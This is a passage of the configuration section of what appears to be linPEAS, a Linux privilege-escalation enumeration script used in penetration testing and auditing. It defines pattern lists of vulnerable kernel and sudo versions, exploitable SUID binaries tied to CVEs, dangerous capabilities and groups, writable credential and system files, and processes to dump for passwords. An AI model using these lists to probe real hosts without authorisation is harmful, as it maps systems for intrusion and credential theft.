el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7" 956 957 sudovB="[01].[012345678].[0-9]+|1.9.[01234][^0-9]|1.9.[01234]$|1.9.5p1|1\.9\.[6-9]|1\.9\.1[0-6]|1\.9\.17($|[^0-9p]|p[12]([^0-9]|$))" 958 959 mountpermsB="\Wsuid|\Wuser|\Wexec" 960 961 mountpermsG="nosuid|nouser|noexec" 962 963 mounted=$( (cat /proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut -d " " -f5 | grep "^/" | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}') 964 if ! [ "$mounted" ]; then 965 mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}') 966 fi 967 if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi 968 969 mountG="swap|/cdrom|/floppy|/dev/shm" 970 971 notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee" 972 973 containercapsB="sys_admin|sys_ptrace|sys_module|dac_read_search|dac_override|sys_rawio|syslog|net_raw|net_admin" 974 975 GREP_IGNORE_MOUNTS="/ /|/null | proc proc |/dev/console" 976 977 GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append" 978 979 GCP_BAD_SCOPES="/cloud-platform|/compute" 980 981 mygroups=$(groups 2>/dev/null | tr " " "|") 982 983 dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.intel.tss2.Tabrmd|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|net.hadess.SwitcherooControl|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.nm_priv_helper|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.SystemToolsBackends|org.freedesktop.SystemToolsBackends.[a-zA-Z0-9_]+|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.gnome.DisplayManager|org.opensuse.CupsPkHelper.Mechanism" 984 985 processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:" 986 987 processesB="amazon-ssm-agent|knockd|splunk" 988 989 rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService" 990 991 processesVB='jdwp|tmux |screen | inspect |--inspect=|--inspect |--inspect$|--inpect-brk|--remote-debugging-port' 992 993 cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|mod-pagespeed|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|" 994 995 cronjobsB="centreon|pg_basebackup|run-parts|crontab-ui" 996 997 timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|dpkg-db-backup.timer|e2scrub_all.timer|exim4-base.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" 998 999 PASSTRY="2000" #Default num of passwds to try (all by default) 1000 1001 Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|') 1002 1003 groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)|\(staff\)" 1004 1005 groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)" 1006 1007 MyUID=$(id -u $(whoami)) 1008 1009 if [ "$MyUID" ]; then 1010 myuid=$MyUID; 1011 elif [ $(id -u $(whoami) 2>/dev/null) ]; then 1012 myuid=$(id -u $(whoami) 2>/dev/null); 1013 elif [ "$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1)" ]; then 1014 myuid=$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1); 1015 fi 1016 if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi 1017 1018 idB="euid|egid$baduid" 1019 1020 knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html 1021 1022 sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|env_keep|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount|/restic|/usermod|/sbin/ldconfig|/usr/sbin/ldconfig|ldconfig -f|--password-command|--password-file|-o ProxyCommand|-o PreferredAuthentications" 1023 1024 sudoG="NOEXEC" 1025 1026 USEFUL_SOFTWARE="authbind aws az base64 ctr curl doas docker fetch g++ gcc gcloud gdb go kubectl lua lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm" 1027 1028 NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so" 1029 1030 cfuncs='file|free|main|more|read|split|write' 1031 1032 LDD="$(command -v ldd 2>/dev/null || echo -n '')" 1033 1034 READELF="$(command -v readelf 2>/dev/null || echo -n '')" 1035 1036 #Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION 1037 sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ 1038 /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\ 1039 /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22\ 1040 /chfn$%SuSE_9.3/10\ 1041 /check_icmp$%Monitoring_Plugins<3.0.1_if_setuid-root\(07-2026\)\ 1042 /chkey$%Solaris_2.5.1\ 1043 /chkperm$%Solaris_7.0_\ 1044 /chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD 6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\ 1045 /chpasswd$%SquirrelMail\(2004-04\)\ 1046 /dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\ 1047 /dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\ 1048 /dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\ 1049 /enlightenment_backlight$%Before_0.25.4_\(CVE-2022-37706\)\ 1050 /enlightenment_ckpasswd$%Before_0.25.4_\(CVE-2022-37706\)\ 1051 /enlightenment_sys$%Before_0.25.4_\(CVE-2022-37706\)\ 1052 /eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\ 1053 /ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\ 1054 /kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\ 1055 /kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\ 1056 /keybase-redirector%CentOS_Linux_release_7.4.1708\ 1057 /login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\ 1058 /lpc$%S.u.S.E_Linux_5.2\ 1059 /lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\ 1060 /mail.local$%NetBSD_7.0-7.0.1__6.1-6.1.5__6.0-6.0.6\ 1061 /mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\ 1062 /movemail$%Emacs\(08-1986\)\ 1063 /mrinfo$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\ 1064 /mtrace$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\ 1065 /netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\ 1066 /newgrp$%HP-UX_10.20\ 1067 /ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\ 1068 /passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\ 1069 /pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)/Generic_CVE-2021-4034\ 1070 /pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\ 1071 /pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\ 1072 /pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\ 1073 /rcp$%RedHat_6.2\ 1074 /rdist$%Solaris_10/OpenSolaris\ 1075 /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\ 1076 /screen$%GNU_Screen_4.5.0\ 1077 /sdtcm_convert$%Sun_Solaris_7.0\ 1078 /sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\ 1079 /snap-confine$%Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation\(CVE-2019-7304\)\ 1080 /sudo%check_if_the_sudo_version_is_vulnerable\ 1081 /Serv-U%FTP_Server<15.1.7(CVE-2019-12181)\ 1082 /sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\ 1083 /tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\ 1084 /traceroute$%LBL_Traceroute_\[2000-11-15\]\ 1085 /ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\ 1086 /umount$%BSD/Linux\(08-1996\)\ 1087 /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\ 1088 /uucp$%Taylor_UUCP_1.0.6\ 1089 /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\ 1090 /xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\ 1091 /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\ 1092 /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ 1093 /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" 1094 1095 sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent$|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$" 1096 sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/helper$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/load_osxfuse$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount$|/mount.cifs$|/mount.ecryptfs_private$|/mount.nfs$|/mount.nfs4$|/mount_osxfuse$|/mtr$|/mutt_dotlock$" 1097 sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/hping3$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$" 1098 sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$" 1099 1100 sidVB='/R$|/aa-exec$|/ab$|/acr$|/agetty$|/alpine$|/apache2$|/apt-get$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/asterisk$|/atobm$|/aws$|/base32$|/base64$|/basenc$|/basez$|/bash$|/batcat$|/bc$|/bconsole$|/bee$|/bridge$|/busctl$|/bzip2$|/cabal$|/cancel$|/capsh$|/cat$|/chattr$|/chmod$|/choom$|/chown$|/chroot$|/chrt$|/clamscan$|/clisp$|/cmp$|/cobc$|/column$|/comm$|/cp$|/cpio$|/cpulimit$|/crash$|/csh$|/csplit$|/csvtool$|/ctr$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dc$|/dd$|/debugfs$|/dialog$|/diff$|/dig$|/distcc$|/dmesg$|/dmsetup$|/dnsmasq$|/docker$|/dos2unix$|/dosbox$|/dpkg$|/dvips$|/easyrsa$|/ed$|/efax$|/egrep$|/elvish$|/enscript$|/env$|/eqn$|/espeak$|/ex$|/expand$|/expect$|/fastfetch$|/ffmpeg$|/fgrep$|/file$|/find$|/finger$|/fish$|/flock$|/fmt$|/fold$|/forge$|/fping$|/ftp$|/fzf$|/gawk$|/gcloud$|/gcore$|/gdb$|/genie$|/genisoimage$|/getent$|/ginsh$|/git$|/gnuplot$|/grep$|/gtester$|/guile$|/gzip$|/head$|/hexdump$|/hg$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/joe$|/join$|/jq$|/jrunscript$|/julia$|/ksshell$|/kubectl$|/last$|/latex$|/ld.so$|/ldconfig$|/less$|/lftp$|/links$|/logrotate$|/logsave$|/look$|/lp$|/ltrace$|/lua$|/lualatex$|/luatex$|/lxd$|/m4$|/mail$|/make$|/man$|/mawk$' 1101 sidVB2='/minicom$|/more$|/mosquitto$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$|/multitime$|/mv$|/mysql$|/nano$|/nasm$|/nc$|/ncdu$|/ncftp$|/nginx$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/nsenter$|/ntpdate$|/octave$|/od$|/opencode$|/openssl$|/openvpn$|/pandoc$|/paste$|/pax$|/pdflatex$|/pdftex$|/perf$|/perl$|/pexec$|/pg$|/php$|/pic$|/pidstat$|/plymouth$|/pr$|/psftp$|/psql$|/ptx$|/python$|/qpdf$|/rc$|/readelf$|/redis$|/restic$|/rev$|/rlogin$|/rlwrap$|/rpm$|/rpmdb$|/rpmquery$|/rpmverify$|/rsync$|/rtorrent$|/run-parts$|/runscript$|/sash$|/scanmem$|/scp$|/script$|/scrot$|/sed$|/setarch$|/setcap$|/setfacl$|/setlock$|/sftp$|/shred$|/shuf$|/slsh$|/socat$|/socket$|/soelim$|/softlimit$|/sort$|/split$|/sqlite3$|/ss$|/ssh$|/ssh-agent$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/task$|/tasksh$|/tbl$|/tclsh$|/tcpdump$|/tcsh$|/tdbtool$|/tee$|/telnet$|/terraform$|/tex$|/tftp$|/tic$|/time$|/timeout$|/tmate$|/tmux$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/unsquashfs$|/unzip$|/update-alternatives$|/urlget$|/uuencode$|/varnishncsa$|/vi$|/vigr$|/vim$|/vipw$|/volatility$|/w3m$|/watch$|/wc$|/wget$|/whiptail$|/whois$|/wish$|/xargs$|/xdotool$|/xmodmap$|/xmore$|/xpad$|/xxd$|/xz$|/yash$|/zic$|/zip$|/zless$|/zsh$|/zsoelim$' 1102 1103 STRACE="$(command -v strace 2>/dev/null || echo -n '')" 1104 1105 STRINGS="$(command -v strings 2>/dev/null || echo -n '')" 1106 1107 writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$" 1108 1109 OLDPATH=$PATH 1110 ADDPATH=":/usr/local/sbin\ 1111 :/usr/local/bin\ 1112 :/usr/sbin\ 1113 :/usr/bin\ 1114 :/sbin\ 1115 :/bin" 1116 spath=":$PATH" 1117 for P in $ADDPATH; do 1118 if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi 1119 done 1120 1121 writeVB="/etc/anacrontab|/etc/apt/apt.conf.d|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/ld.so.preload|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/cron/tabs/|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|/bin/bash|/usr/bin/bash|/bin/sh|/usr/bin/sh|/bin/dash|/usr/bin/dash|/bin/zsh|/usr/bin/zsh|/usr/bin/env|"$(echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g') #Add Path but remove simple dot in PATH 1122 1123 capsVB="cap_sys_admin:mount|python \ 1124 cap_sys_ptrace:python \ 1125 cap_sys_module:kmod|python \ 1126 cap_dac_override:python|vim \ 1127 cap_chown:chown|python \ 1128 cap_fowner:chown|python \ 1129 cap_setfcap:python|perl|ruby|php|node|lua|bash \ 1130 cap_setpcap:python|perl|ruby|php|node|lua|bash \ 1131 cap_setuid:gdb|gzip|node|perl|php|python|ruby|tclsh \ 1132 cap_setgid:gdb|gzip|node|perl|php|python|ruby|tclsh \ 1133 cap_net_raw:python|tcpdump|dumpcap|tcpflow" 1134 1135 capsB="=ep|cap_chown|cap_fowner|cap_fsetid|cap_setpcap|cap_setfcap|cap_dac_override|cap_dac_read_search|cap_setuid|cap_setgid|cap_kill|cap_net_bind_service|cap_net_raw|cap_net_admin|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_sys_rawio|cap_bpf|cap_perfmon" 1136 1137 ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" 1138 1139 profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|im-config_wayland.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" 1140 1141 mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier" 1142 1143 knw_usrs='_amavisd|_analyticsd|_appinstalld|_appleevents|_applepay|_appowner|_appserver|_appstore|_ard|_assetcache|_astris|_atsserver|_avbdeviced|_calendar|_captiveagent|_ces|_clamav|_cmiodalassistants|_coreaudiod|_coremediaiod|_coreml|_ctkd|_cvmsroot|_cvs|_cyrus|_datadetectors|_demod|_devdocs|_devicemgr|_diskimagesiod|_displaypolicyd|_distnote|_dovecot|_dovenull|_dpaudio|_driverkit|_eppc|_findmydevice|_fpsd|_ftp|_fud|_gamecontrollerd|_geod|_hidd|_iconservices|_installassistant|_installcoordinationd|_installer|_jabber|_kadmin_admin|_kadmin_changepw|_knowledgegraphd|_krb_anonymous|_krb_changepw|_krb_kadmin|_krb_kerberos|_krb_krbtgt|_krbfast|_krbtgt|_launchservicesd|_lda|_locationd|_logd|_lp|_mailman|_mbsetupuser|_mcxalr|_mdnsresponder|_mobileasset|_mysql|_nearbyd|_netbios|_netstatistics|_networkd|_nsurlsessiond|_nsurlstoraged|_oahd|_ondemand|_postfix|_postgres|_qtss|_reportmemoryexception|_rmd|_sandbox|_screensaver|_scsd|_securityagent|_softwareupdate|_spotlight|_sshd|_svn|_taskgated|_teamsserver|_timed|_timezone|_tokend|_trustd|_trustevaluationagent|_unknown|_update_sharing|_usbmuxd|_uucp|_warmd|_webauthserver|_windowserver|_www|_wwwproxy|_xserverdocs|daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+' 1144 1145 if [ "$MACPEAS" ]; then 1146 sh_usrs="ImPoSSssSiBlEee" 1147 nosh_usrs="ImPoSSssSiBlEee" 1148 dscl . list /Users | while read uname; do 1149 ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) 1150 if grep -q \"$ushell\" /etc/shells; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi 1151 done 1152 else 1153 sh_usrs=$(cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[[:space:]:]|^bin$|/' | sed 's/|sys|/|sys[[:space:]:]|^sys$|/' | sed 's/|daemon|/|daemon[[:space:]:]|^daemon$|/')"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere 1154 nosh_usrs=$(cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[[:space:]:]|^bin$|/')"ImPoSSssSiBlEee" 1155 fi 1156 1157 notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$|\.svg$" 1158 1159 notBackup="/tdbbackup$|/db_hotbackup$" 1160 1161 